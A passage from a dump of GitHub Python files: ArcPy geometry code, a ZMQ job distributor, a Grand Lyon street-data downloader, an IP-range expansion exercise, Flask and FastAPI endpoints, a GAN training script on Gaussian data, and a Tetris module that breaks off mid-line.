# arcpy.env.scratchWorkspace = 'C:/GIS/EBAR/EBAR4.gdb'\n\n # arcpy.MakeFeatureLayer_management(input, 'rmi_lyr') #, 'OBJECTID > 1281') #, \"OriginalGeometryType NOT IN ('Y')\")\n # with arcpy.da.SearchCursor('rmi_lyr', ['OBJECTID', 'Accuracy', 'OriginalGeometryType'], sql_clause=(None,'ORDER BY OBJECTID')) as search_cursor:\n # for row in search_cursor:\n # print(row[0])\n # arcpy.SelectLayerByAttribute_management('rmi_lyr', 'NEW_SELECTION', 'OBJECTID = ' + str(row[0]))\n # if row[2] == 'P':\n # # simplify\n # accuracy = 10\n # if row[1]:\n # if row[1] > 0:\n # accuracy = row[1]\n # tolerance = '100 Meters'\n # if accuracy < 500:\n # tolerance = '10 Meters'\n # if accuracy < 50:\n # tolerance = '1 Meters'\n # if accuracy < 5:\n # tolerance = '10 Centimeters'\n # arcpy.SimplifyPolygon_cartography('rmi_lyr', temp, 'POINT_REMOVE', tolerance, collapsed_point_option='NO_KEEP')\n # arcpy.AddGlobalIDs_management(temp)\n # # append simplified\n # field_mapping = 'GlobalID \"GlobalID\" false false true 38 GlobalID 0 0,First,#,' + temp + \\\n # ',GlobalID,-1,-1;RangeMapID \"RangeMapID\" true true false 4 Long 0 0,First,#,' + temp + \\\n # ',RangeMapID,-1,-1;DatasetSourceName \"DatasetSourceName\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',DatasetSourceName,0,255;DatasetType \"DatasetType\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',DatasetType,0,255;Accuracy \"Accuracy\" true true false 4 Long 0 0,First,#,' + temp + \\\n # ',Accuracy,-1,-1;MaxDate \"MaxDate\" true true false 8 Date 0 0,First,#,' + temp + \\\n # ',MaxDate,-1,-1;CoordinatesObscured \"CoordinatesObscured\" true true false 2 Short 0 0,First,#,' + temp + \\\n # ',CoordinatesObscured,-1,-1;OriginalGeometryType \"OriginalGeometryType\" true true false 1 Text 0 0,First,#,' + temp + \\\n # ',OriginalGeometryType,0,1;NationalScientificName \"NationalScientificName\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',NationalScientificName,0,255;SynonymName \"SynonymName\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',SynonymName,0,255;URI \"URI\" true true false 1000 Text 0 0,First,#,' + temp + \\\n # ',URI,0,1000;EORank \"EORank\" true true false 2 Text 0 0,First,#,' + temp + \\\n # ',EORank,0,2;DatasetSourceUniqueID \"DatasetSourceUniqueID\" true true false 255 Text 0 0,First,#,' + temp + \\\n # ',DatasetSourceUniqueID,0,255'\n # arcpy.Append_management(temp, output, 'NO_TEST', field_mapping)\n # else:\n # # append original\n # arcpy.Append_management('rmi_lyr', output, 'TEST')\n","repo_name":"NatureServe-Canada/EBARTools","sub_path":"SimplifyExistingInputs.py","file_name":"SimplifyExistingInputs.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"12012102185","text":"from comm.sendrecv import recv_zipped_pickle, send_next_chunk\nimport numpy as np\nfrom genutils.ptyprint import printprogress\n\ndef dstr_collect(keys,n,gen,socket,zlevel=-1,verb=False):\n \"\"\"\n Distributes data to workers\n and collects the results based on the keys passed\n\n Parameters:\n keys - list of keys to expect to receive from client\n n - length of input generator\n gen - an input generator that gives a chunk\n socket - a ZMQ socket\n zlevel - level of compression [0]\n\n Returns a dictionary with keys of keys and values\n returned by the client\n \"\"\"\n # Create the outputs\n odict = {}\n for ikey in keys: odict[ikey] = []\n # Control key\n ckey = keys[0]\n # Verbosity\n old = -1\n # Send and collect work\n while(len(odict[ckey]) < n):\n if(verb):\n if(old < len(odict[ckey])):\n printprogress(ckey+\":\",len(odict[ckey]),n)\n old = len(odict[ckey])\n # Talk to client\n rdict = recv_zipped_pickle(socket)\n if(rdict['msg'] == \"available\"):\n # Send work\n send_next_chunk(socket,gen,zlevel)\n elif(rdict['msg'] == \"result\"):\n # Save the results\n for ikey in keys:\n odict[ikey].append(rdict[ikey])\n # Send a \"thank you\" back\n socket.send(b\"\")\n\n if(verb): printprogress(ckey+\":\",len(odict[ckey]),n)\n\n return odict\n\ndef dstr_sum(ckey,rkey,n,gen,socket,shape,ikey='idx',zlevel=-1):\n \"\"\"\n Distributes data to workers\n and sums over the collected results\n\n Parameters:\n ckey - a control key for managing submissions\n rkey - a result key for summing the results\n n - length of input generator\n gen - an input generator that gives a junk\n socket - a ZMQ socket\n shape - the shape of the output array\n ikey - key for sending the index for chunked transfer ['idx']\n zlevel - level of compression [0]\n\n Returns:\n Sums over the work returned by workers to give an\n output array of size shape\n \"\"\"\n # Create the outputs\n out = np.zeros(shape,dtype='float32')\n chunks,nhx = False,1\n if(len(shape) > 3):\n chunks = True\n nhx = shape[1]\n nouts = []\n # Send and sum over collected results\n while(len(nouts)//nhx < n):\n rdict = recv_zipped_pickle(socket)\n if(rdict['msg'] == \"available\"):\n # Send work\n send_next_chunk(socket,gen,zlevel=zlevel)\n elif(rdict['msg'] == \"result\"):\n nouts.append(rdict[ckey])\n if(chunks):\n out[0,rdict[ikey]] += rdict[rkey]\n else:\n out += rdict[rkey]\n socket.send(b\"\")\n\n return out\n\n","repo_name":"ke0m/distrmq","sub_path":"server/distribute.py","file_name":"distribute.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"33191884494","text":"#!/usr/bin/python3\n# -!- encoding:utf8 -!-\n\n# ---------------------------- IMPORTS\n\nfrom subprocess import call\nfrom ...fs.fs import list_heatmap_streets\nfrom ...fs.fs import load_heatmap_streets\nfrom ...fs.fs import dump_heatmap_grid\nfrom ...fs.fs import dump_heatmap_psd\nfrom ...printer.printer import print_progress\n\n# ---------------------------- CONFIGURATION\n\nbaseurl = 'https://download.data.grandlyon.com/wfs/grandlyon'\nparams = {\n 'SERVICE': 'WFS',\n 'VERSION': '2.0.0',\n 'outputformat': 'GEOJSON',\n 'maxfeatures': '1000000000',\n 'request': 'GetFeature',\n 'typename': 'adr_voie_lieu.adraxevoie',\n 'SRSNAME': 'urn:ogc:def:crs:EPSG::4171'\n}\n\n# ---------------------------- FUNCTIONS\n\n\ndef download_streets_data():\n \"\"\"\n Récupère les données des rues en utilisant l'api du Grand Lyon\n \"\"\"\n # build url\n url = baseurl + '?'\n for key, value in params.items():\n url += key + '=' + value + '&'\n url = url[:-1]\n # call wget\n print('[process_streets.py]> retrieving data...')\n call(['wget', '-O', list_heatmap_streets(), url])\n print('[data_processor.py]> done !')\n\n\ndef split_on_commune(data):\n \"\"\"\n Création d'un dictionnaire indexé sur les communes pour les rues\n \"\"\"\n # split data structure using 'nomcommune' field\n streets = data['features']\n communes = {}\n total = len(streets)\n i = 0\n print('[process_streets.py]> processing %s streets...' % total)\n for street in streets:\n i += 1\n if i % 100 == 0:\n print_progress(i, total)\n commune = street['properties']['nomcommune']\n if commune not in communes.keys():\n communes[commune] = []\n # add street to commune\n communes[commune].append({\n 'nom': street['properties']['nom'],\n 'coordinates': street['geometry']['coordinates']\n })\n print('[process_streets.py]> done !')\n return communes\n\n\ndef create_files(communes):\n \"\"\"\n Génération des fichiers de sortie (psd, grille)\n \"\"\"\n # creating ouput files\n for commune, data in communes.items():\n print('[process_streets.py]> writing psd file for %s...' % commune, end='')\n dump_heatmap_psd(commune, data)\n print('done !')\n print('[process_streets.py]> writing grid file for %s...' % commune, end='')\n coordinates = []\n for elem in data:\n coordinates += elem['coordinates']\n dump_heatmap_grid(commune, coordinates)\n print('done !')\n\n\ndef process_streets():\n \"\"\"\n Découpage intégral du fichier streets.json en fichiers par commune\n \"\"\"\n # load streets data\n streets = load_heatmap_streets()\n # split on communes\n communes = split_on_commune(streets)\n # create output files\n create_files(communes)\n\n\ndef update_streets_data():\n \"\"\"\n Télécharge et lance le traitement des données\n \"\"\"\n # download data\n download_streets_data()\n # process data\n process_streets()\n","repo_name":"Hexanonyme/PLD_SmartCity","sub_path":"Backend/api/maintenance/heatmap/process_streets.py","file_name":"process_streets.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8962825911","text":"# -*- coding: utf-8 -*-\n'''\nЗадание 12.2\n\n\nФункция check_ip_addresses из задания 12.1 принимает только список адресов,\nно было бы удобно иметь возможность указывать адреса с помощью диапазона, например, 192.168.100.1-10.\n\nВ этом задании необходимо создать функцию convert_ranges_to_ip_list,\nкоторая конвертирует список IP-адресов в разных форматах в список, где каждый IP-адрес указан отдельно.\n\nФункция ожидает как аргумент список IP-адресов и/или диапазонов IP-адресов.\n\nЭлементы списка могут быть в формате:\n* 10.1.1.1\n* 10.1.1.1-10.1.1.10\n* 10.1.1.1-10\n\nЕсли адрес указан в виде диапазона, надо развернуть диапазон в отдельные адреса, включая последний адрес диапазона.\nДля упрощения задачи, можно считать, что в диапазоне всегда меняется только последний октет адреса.\n\nФункция возвращает список IP-адресов.\n\n\nНапример, если передать функции convert_ranges_to_ip_list такой список:\n['8.8.4.4', '1.1.1.1-3', '172.21.41.128-172.21.41.132']\n\nФункция должна вернуть такой список:\n['8.8.4.4', '1.1.1.1', '1.1.1.2', '1.1.1.3', '172.21.41.128',\n '172.21.41.129', '172.21.41.130', '172.21.41.131', '172.21.41.132']\n\n'''\nfrom ipaddress import ip_address\n\n\ndef check_if_ip_is_network(ip_a):\n '''\n The function checks validity of IP addresses\n :param ip_a: # ip-addresses\n :return: True / False\n '''\n try:\n ip_address(ip_a)\n return True\n except ValueError:\n return False\n\n\ndef convert_ranges_to_ip_list(list_of_ip):\n '''\n The function converts the list of IP addresses in different formats to a list where each IP address is listed\n separately.\n :param list_of_ip: # a list of ip-addresses and/or ip-address ranges\n :return: ip_list # a list of ip-addresses\n '''\n to_ip_list = []\n for list_ip in list_of_ip:\n if check_if_ip_is_network(list_ip):\n to_ip_list.append(list_ip) # appended into the list a valid ip-address\n else:\n list_ip = list_ip.split('-')\n range_ip = (int(list_ip[1].split('.')[-1]) - int(list_ip[0].split('.')[-1]))\n list_ip = ip_address(list_ip[0])\n for i in range(0, range_ip + 1):\n to_ip_list.append(str(list_ip))\n list_ip += 1\n i += 1\n return to_ip_list\n\n\nlist_ip = ['8.8.4.4', '1.1.1.1-3', '172.21.41.128-172.21.41.132', '8.8.8.8']\nprint(convert_ranges_to_ip_list(list_ip))","repo_name":"gusevroman/Python-Network","sub_path":"exercises/12_useful_modules/task_12_2.py","file_name":"task_12_2.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13219255887","text":"from flask import Blueprint, request, jsonify\nfrom api.models import Availability, MentorProfile\nfrom api.core import create_response, logger\nfrom api.utils.require_auth import all_users\n\navailability = Blueprint(\"availability\", __name__)\n\n\n# Get request for avalability for a specific mentor\n@availability.route(\"/\", methods=[\"GET\"])\n@all_users\ndef get_availability(id):\n try:\n availability = MentorProfile.objects.get(id=id).availability\n except:\n msg = \"No mentor found with that id\"\n logger.info(msg)\n return create_response(status=422, message=msg)\n\n return create_response(data={\"availability\": availability})\n\n\n# Put request to edit availability for a specific mentor\n@availability.route(\"/\", methods=[\"PUT\"])\n@all_users\ndef edit_availability(id):\n data = request.get_json().get(\"Availability\")\n try:\n mentor = MentorProfile.objects.get(id=id)\n except:\n msg = \"No mentor found with that id\"\n logger.info(msg)\n return create_response(status=422, message=msg)\n\n mentor.availability = [\n Availability(\n start_time=availability.get(\"start_time\").get(\"$date\"),\n end_time=availability.get(\"end_time\").get(\"$date\"),\n )\n for availability in data\n ]\n mentor.save()\n return create_response(status=200, message=f\"Success\")\n","repo_name":"hack4impact-uiuc/mentee","sub_path":"backend/api/views/availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"72355804962","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import HTMLResponse\n\nfrom document_extract import CandidateInfo, extract_candidate_infos, render_candidate_infos\n\nimport uvicorn\nimport threading\nimport logging\nimport time\n\nfrom pathlib import Path\nfrom datetime import datetime\n\ndef setup_fastapi():\n app = FastAPI()\n origins = [\"*\"]\n app.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n return app\n\nclass CandidateCache():\n candidate_info_html = \"

Processing, please wait ...

\"\n\ncandidate_cache = CandidateCache()\n\nSLEEP_TIME = 60 * 10\n\nclass BackgroundTasks(threading.Thread):\n\n \"\"\"\n Processes documents and query Chat GPT in the background.\n \"\"\"\n\n def __init__(self, candidate_cache: CandidateCache, sleep_time = SLEEP_TIME):\n super().__init__()\n self.candidate_cache, self.sleep_time = candidate_cache, sleep_time\n self.data_cache = sleep_time\n\n def run(self, *args, **kwargs):\n while True:\n candidate_infos: list[CandidateInfo] = extract_candidate_infos(Path(\".\"))\n self.candidate_cache.candidate_info_html = render_candidate_infos(candidate_infos)\n logging.info('Updated doc analysis')\n time.sleep(self.sleep_time)\n\nt = BackgroundTasks(candidate_cache)\nt.start()\n\napp = setup_fastapi()\n\n@app.get(\"/hello\")\nasync def hello():\n return {\n \"hello\": \"there\"\n }\n\n@app.get(\"/candidates.html\", response_class=HTMLResponse)\nasync def hello_html():\n\n def generate_timestamp():\n # Get the current date and time\n now = datetime.now()\n\n # Get the weekday, day, month, year, and time in English\n weekday = now.strftime(\"%A\")\n day = now.strftime(\"%d\")\n month = now.strftime(\"%B\")\n year = now.strftime(\"%Y\")\n time = now.strftime(\"%H:%M:%S\")\n\n # Create the timestamp string\n timestamp = f\"{weekday}, {day} {month} {year} {time}\"\n\n return timestamp\n\n return f\"\"\"\n\n \n \n \n \n \n \n \n
\n

Candidate Information

\n

{generate_timestamp()}

\n
\n
\n \n
\n
\n {candidate_cache.candidate_info_html}\n
\n \n \n\n\"\"\"\n\nif __name__ == '__main__':\n print(\"Fast API setup\") \n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n ","repo_name":"gilfernandes/document_stuff_playground","sub_path":"document_web.py","file_name":"document_web.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5804814325","text":"from __future__ import (division, print_function, )\nfrom collections import OrderedDict\nfrom scipy.stats import multivariate_normal\nimport numpy.random as npr\nimport numpy as np\nfrom itertools import *\n\nfrom fuel import config\nfrom fuel.datasets import H5PYDataset, IndexableDataset\nfrom fuel.transformers.defaults import uint8_pixels_to_floatX\nfrom fuel.utils import find_in_data_path\nfrom fuel.streams import DataStream\nfrom fuel.schemes import ShuffledScheme\n\nimport torch\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset\n\nimport scipy.misc\nimport imageio\nimport matplotlib.gridspec as gridspec\nimport os, time, pickle\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport Gaussian_Sample_HighD as GS\n\nfrom scipy.stats import multivariate_normal, entropy\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-g', '--gpu', type=str, default='-1', metavar='GPU',\n help='set GPU id (default: -1)')\nparser.add_argument('-b', '--batch-size', type=int, default=128, metavar='N',\n help='input batch size for training (default: 128)')\nparser.add_argument('-e', '--epochs', type=int, default=100, metavar='E',\n help='how many epochs to train (default: 100)')\nparser.add_argument('--lr-g', type=float, default=1e-5, metavar='LR',\n help='initial ADAM learning rate of G (default: 1e-3)')\nparser.add_argument('--lr-d', type=float, default=1e-5, metavar='LR',\n help='initial ADAM learning rate of D (default: 1e-3)')\nparser.add_argument('--decay', type=float, default=0, metavar='D',\n help='weight decay or L2 penalty (default: 0)')\nparser.add_argument('-z', '--zdim', type=int, default=16, metavar='Z',\n help='dimension of latent vector (default: 16)')\n\nopt = parser.parse_args()\n\nimport os\nimport sys\nimport numpy as np\nimport ite\n\ncuda = 0 if opt.gpu == -1 else 1\nif cuda:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = opt.gpu\nBS = opt.batch_size\nZdim = opt.zdim\nIMAGE_PATH = 'GAN_images'\nMODEL_PATH = 'GAN_models'\nTEST = 5000\n\n# ===============\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nfrom itertools import chain\nfrom torchvision.utils import save_image\nfrom GAN_highd import *\n\nif not os.path.exists(IMAGE_PATH):\n print('mkdir ', IMAGE_PATH)\n os.mkdir(IMAGE_PATH)\nif not os.path.exists(MODEL_PATH):\n print('mkdir ', MODEL_PATH)\n os.mkdir(MODEL_PATH)\n\n\ndef count(xx):\n import itertools\n import collections\n #X = [-2.5, -2, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, 2]\n # Y = [-700, 700, 0, -1400, 1400]\n # MEANS = []\n # for x in X:\n # MEANS.append(np.array([x] * 700 + [0]*500))\n #VARIANCES = [0.05 ** 2 * np.eye(len(mean)) for mean in MEANS]\n #MEANS = [x + [0] * 500 for x in MEANS]\n\n MEANS = [np.array([i, j]) for i, j in itertools.product(range(-4, 5, 2),\n range(-4, 5, 2))]\n VARIANCES = [0.05 ** 2 * np.eye(len(mean)) for mean in MEANS]\n SIGMA = np.log(0.05**2)\n\n l2_store = []\n for x_ in xx:\n l2_store.append([np.sum((x_ - i) ** 2) for i in MEANS])\n\n mode = np.argmin(l2_store, 1).flatten().tolist()\n dis_ = [l2_store[j][i] for j, i in enumerate(mode)]\n loglikehood_list = [-1.0*(np.sum(0.5 * (xx[j] - MEANS[i]) ** 2 * np.exp(-SIGMA) + 0.5 * SIGMA + 0.5 * np.log(2*np.pi))) for j, i in enumerate(mode)]\n loglikehood = np.mean(loglikehood_list)\n print(np.sqrt(dis_[0]))\n mode_counter = [mode[i] for i in range(len(mode)) if (np.sqrt(dis_[i])) <= 0.5]\n\n print('Number of Modes Captured: ', len(collections.Counter(mode_counter)))\n print('Number of Points Falling Within 3 std. of the Nearest Mode ', np.sum(\n collections.Counter(mode_counter).values()))\n print('Loglikehood is: ', loglikehood)\n\n\ndef prog_print(e,b,b_total,loss_g,loss_d):\n sys.stdout.write(\"\\r%3d: [%5d / %5d] G: %.4f D: %.4f\" %\n (e,b,b_total,loss_g,loss_d))\n sys.stdout.flush()\n\ndef train():\n # load models\n Gx = GeneratorX()\n Dx = DiscriminatorX()\n\n # load dataset\n # ==========================\n train_data, valid_data, trans_mtx = GS.main()\n train_dataset = GS.Gaussian_Data(train_data)\n valid_dataset = GS.Gaussian_Data(valid_data)\n\n dataloader = DataLoader(dataset=train_dataset,\n batch_size=BS,\n pin_memory= True,\n shuffle=True)\n validloader = DataLoader(dataset=valid_dataset,\n batch_size=TEST,\n pin_memory=True,\n shuffle=False)\n\n N = len(dataloader)\n # print(N)\n\n z = torch.FloatTensor(BS, Zdim).normal_(0, 1)\n z_pred = torch.FloatTensor(TEST, Zdim).normal_(0, 1)\n z_pred = Variable(z_pred)\n\n if cuda:\n Gx.cuda()\n Dx.cuda()\n z, z_pred = z.cuda(), z_pred.cuda()\n\n\n # optimizer\n optim_g = optim.Adam(chain(Gx.parameters()),\n lr=opt.lr_g, betas=(.5, .999), weight_decay=opt.decay)\n optim_d = optim.Adam(chain(Dx.parameters()),\n lr=opt.lr_d, betas=(.5, .999), weight_decay=opt.decay)\n\n # train\n # ==========================\n softplus = nn.Softplus()\n for epoch in range(opt.epochs):\n for i, (imgs, _) in enumerate(dataloader):\n batch_size = imgs.size(0)\n if cuda:\n imgs = imgs.cuda()\n imgs = Variable(imgs)\n z.resize_(batch_size, Zdim).normal_(0, 1)\n zv = Variable(z)\n\n # forward\n imgs_fake = Gx(zv)\n\n # discriminator\n d_true = Dx(imgs)\n d_fake = Dx(imgs_fake)\n\n # compute loss\n loss_d = torch.mean(softplus(-d_true) + softplus(d_fake))\n loss_g = torch.mean(softplus(-d_fake))\n\n # backward & update params\n Dx.zero_grad()\n loss_d.backward(retain_graph=True)\n optim_d.step()\n\n Gx.zero_grad()\n loss_g.backward()\n optim_g.step()\n\n prog_print(epoch+1, i+1, N, loss_g.data.item(), loss_d.data.item())\n\n # generate fake images\n # save_image(Gx(z_pred).data,\n # os.path.join(IMAGE_PATH,'%d.png' % (epoch+1)),\n # nrow=9, padding=1,\n # normalize=False)\n # save models\n print(\"-------> Saving models...\")\n torch.save(Gx.state_dict(),\n os.path.join(MODEL_PATH, 'Gx-%d.pth' % (epoch+1)))\n torch.save(Dx.state_dict(),\n os.path.join(MODEL_PATH, 'Dx-%d.pth' % (epoch+1)))\n\n # evaluate models\n x_eval = Gx(z_pred)\n x_eval = x_eval.data.cpu().numpy()\n count(x_eval)\n\n from numpy.random import multivariate_normal, randn\n x_mean = np.zeros(256)\n x_cov = trans_mtx.T.dot(trans_mtx)\n\n conditional_x_sample = z_pred.cpu().data.numpy().dot(trans_mtx)\n normal_x_sample = multivariate_normal(x_mean, x_cov, TEST)\n\n # Normality test\n from scipy.stats import normaltest, shapiro\n co = ite.cost.BDKL_KnnKiTi()\n # co_easy = ite.cost.BDKL_KnnK()\n\n # print(\"Our mean is {}, and var is {}\".format(np.mean(x_eval[:,0]), np.var(x_eval[:,0])))\n # print(\"True mean is {}, and var is {}\".format(np.mean(normal_x_sample[:,0]), np.var(normal_x_sample[:,0])))\n\n #print(\"The normal test p-value is: {}\".format(normaltest(z_sample.data)))\n # print(\"The shapiro test p-value for z is: {}\".format(shapiro(z_sample.data)))\n print(\"The shapiro test p-value for X is: {}\".format(shapiro(x_eval)))\n\n # print(\"The KL-divergence for z is: {}\".format(co.estimation(z_sample, normal_z_sample)))\n print(\"The KL-divergence for X marginal is: {}\".format(co.estimation(x_eval, normal_x_sample)))\n print(\"The KL-divergence for X conditional is: {}\".format(co.estimation(x_eval, conditional_x_sample)))\n # print(\"The KL-divergence between two X is {}\".format(co.estimation(normal_x_sample, conditional_x_sample)))\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"alexanderhanboli/AIM","sub_path":"high_dimensional_experiments/train_GAN.py","file_name":"train_GAN.py","file_ext":"py","file_size_in_byte":8475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"37531917106","text":"from hydra_python_core.doc_writer import (\n HydraClassOp,\n HydraClassProp,\n HydraError,\n HydraStatus,\n)\nfrom exceptions import HydraCollectionException\nfrom processors.api_info_processor import APIInfoProcessor\nfrom parsers.param_parser import ParameterParser\nfrom parsers.resp_parser import ResponseParser\nfrom processors.op_processor import OperationProcessor\nfrom parsers.schema_parser import SchemaParser\n\nfrom typing import Any, List, Dict, Union\n\n\nclass MethodParser:\n def __init__(self, method: str, method_details: Dict[str, Any], id: str) -> None:\n self.method = method.upper()\n self.method_details = method_details\n self.id = id\n\n def parse(self) -> List[Union[HydraClassOp, List[HydraClassProp]]]:\n method_title = str\n hydra_props: List[HydraClassProp] = []\n hydra_op: HydraClassOp\n possible_status: List[Union[HydraStatus, HydraError]] = []\n expects_resource = \"\"\n returns_resource = \"\"\n for key, value in self.method_details.items():\n if key == \"parameters\":\n for parameter in value:\n param_parser = ParameterParser(parameter)\n hydra_class_prop = param_parser.parse()\n hydra_props.append(hydra_class_prop)\n elif key == \"responses\":\n for code, response in value.items():\n response_parser = ResponseParser(code, response)\n hydra_status = response_parser.parse()\n possible_status.append(hydra_status)\n if response_parser.parse_code() != 500:\n returns_resource = response_parser.parse_returns()\n\n elif key == \"operationId\":\n method_title = value\n elif key == \"requestBody\":\n request_content = value.get(\"content\")\n for _, expects in request_content.items():\n schema_parser = SchemaParser(expects.get(\"schema\"))\n hydra_classes, _ = schema_parser.parse()\n for title, _ in hydra_classes.items():\n expects_resource = title\n\n operation_processor = OperationProcessor(\n title=method_title,\n method=self.method,\n id=self.id,\n possible_status=possible_status,\n expects=expects_resource,\n returns=returns_resource,\n )\n hydra_op = operation_processor.generate()\n\n return [hydra_op, hydra_props]\n","repo_name":"HTTP-APIs/hydra-openapi-parser","sub_path":"hydra_openapi_parser/hydra_openapi_parser_v2/parsers/method_parser.py","file_name":"method_parser.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"42880551647","text":"from hangman_pics import HANGMANPICS\nfrom pyfiglet import Figlet\nimport random, os\nimport subprocess\n\n\ndef print_game_intro():\n f = Figlet(font='standard')\n print()\n print(f.renderText('hanngman'))\n\n print(HANGMANPICS[6])\n\n f = Figlet(font='contessa')\n print(f.renderText('Welcome to hangman game!'))\n\ndef fill(word, c, char_indices):\n for i in char_indices:\n word[i] = c\n return word\n\n\ndef fill_letter(word, characters):\n new_word = word\n for c in characters:\n char_indices = [i for i, j in enumerate(random_word) if j == c]\n new_word = fill(new_word,c,char_indices)\n return new_word\n\ndef clear_screen():\n subprocess.call([\"printf\", \"'\\033c'\"])\n display_word = list(len(random_word)*'_')\n print_game_intro()\n print('Guess the word: {}'.format(' '.join(display_word)))\n\n\ndef main():\n print_game_intro()\n words = open('hangman_words.txt').read().splitlines()\n global random_word\n random_word = list(random.choice(words).upper())\n display_word = list(len(random_word)*'_')\n print('Guess the word: {}'.format(' '.join(display_word)))\n user_input_list = []\n error_count = 0\n while error_count <= 5:\n user_input = input('Answer: ').upper()\n if user_input in random_word and user_input not in user_input_list:\n user_input_list.append(user_input)\n display_word = fill_letter(display_word, user_input_list)\n if display_word == random_word:\n print('\\nWell Done!')\n break\n else:\n #print(HANGMANPICS[error_count])\n error_count += 1\n clear_screen()\n if error_count > 0:\n print(HANGMANPICS[error_count])\n print(' '.join(display_word))\n else:\n print('\\nYou are HANGED, the word was: {}'.format(' '.join(random_word)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"mohi7solanki/hangman-game","sub_path":"hangman_game.py","file_name":"hangman_game.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10296121591","text":"from random import randrange as rand\nimport tensorflow as tf\nimport tensorflow.experimental.numpy as tnp\nimport sys\nimport numpy as np\n\n# The configuration\ncell_size = 20\ncols = 10\nrows = 20\nmaxfps = 30\n\ncolors = [\n(0, 0, 0 ),\n(220, 0, 20 ),\n(60, 165, 50 ),\n(100, 100, 255),\n(255, 90, 0 ),\n(255, 200, 40 ),\n(160, 50, 210),\n(70, 230, 210),\n(35, 35, 35) # Helper color for background grid\n]\n\n# Define the shapes of the single parts\ntetris_shapes = [\n tf.constant([\n [1, 1, 1],\n [0, 1, 0]]\n ),\n tf.constant([\n [0, 1, 1],\n [1, 1, 0]\n ]),\n tf.constant([\n [1, 1, 0],\n [0, 1, 1]\n ]),\n tf.constant([\n [1, 0, 0],\n [1, 1, 1]\n ]),\n tf.constant([\n [0, 0, 1],\n [1, 1, 1]\n ]),\n tf.constant([\n [1, 1, 1, 1]\n ]),\n tf.constant([\n [1, 1],\n [1, 1]\n ])\n]\n\nCOLLISION_MOVES = ['LEFT', 'RIGHT', 'ROTATE_LEFT', 'ROTATE_RIGHT'] #These moves give penalties if used in invalid ways\n\n'''\ndef check_collision(board, piece, offset):\n off_x, off_y = offset\n for i, j in np.ndindex(*piece.shape):\n cell = piece[i, j]\n try:\n if cell and board[ i + off_y ][ j + off_x ]:\n return True\n except IndexError:\n return True\n return False\n'''\n\n@tf.function\ndef check_collision(board, piece, offset):\n if piece.shape[0] + offset[0] >= board.shape[0]: return True\n if piece.shape[1] + offset[1] >= board.shape[1]: return True\n\n padded_piece = padToShape(piece, board.shape, offset)\n collided_tiles = tf.math.multiply(board, padded_piece)\n collision = tf.math.reduce_sum(collided_tiles)\n return collision > 0\n\n@tf.function\ndef remove_rows(board, row_mask):\n removed_count = board.shape[0] - tf.math.reduce_sum(row_mask)\n out = tf.range(row_mask.shape[0])\n out = tf.boolean_mask(out, row_mask)\n out = tf.gather(board, out)\n new_rows = tf.zeros((removed_count, board.shape[1]), dtype=tf.int32)\n out = tf.concat((new_rows, out), axis=0)\n return out\n\n# def join_matrices(mat1, mat2, mat2_off):\n# out = np.copy(mat1)\n# off_x, off_y = mat2_off\n# out[off_y: off_y + mat2.shape[0], off_x: off_x + mat2.shape[1]] += mat2\n# return out\n\n@tf.function\ndef join_matrices(mat1, mat2, mat2_off):\n mask = padToShape(mat2, mat1.shape, mat2_off)\n return tf.math.add(mat1, mask)\n\n# def padToShape(arr, shape):\n# result = tf.zeros(shape, dtype=tf.int32)\n# result[:arr.shape[0], :arr.shape[1]] = arr\n# return result\n\n#Pads array {arr} to be of size {shape}, with the orignal array anchored at {offset = (row, col)}\n@tf.function\ndef padToShape(arr, shape, offset=(0,0)):\n p_top = offset[0]\n p_bottom = shape[0] - arr.shape[0] - p_top\n p_left = offset[1]\n p_right = shape[1] - arr.shape[1] - p_left\n paddings = tf.constant([[p_top, p_bottom,], [p_left, p_right]])\n padded = tf.pad(arr, paddings)\n return padded\n\n@tf.function\ndef rotate_tensor(tensor, direction=1):\n out = tf.expand_dims(tensor, -1)\n out = tf.image.rot90(out, k=direction*-1)\n out = tf.squeeze(out, axis=-1)\n return out\n\nclass TetrisApp(object):\n def __init__(self, ai=False, rewards=None):\n self.ai = ai\n self.rewards = rewards\n self.next_stone_idx = rand(len(tetris_shapes))\n self.next_stone = 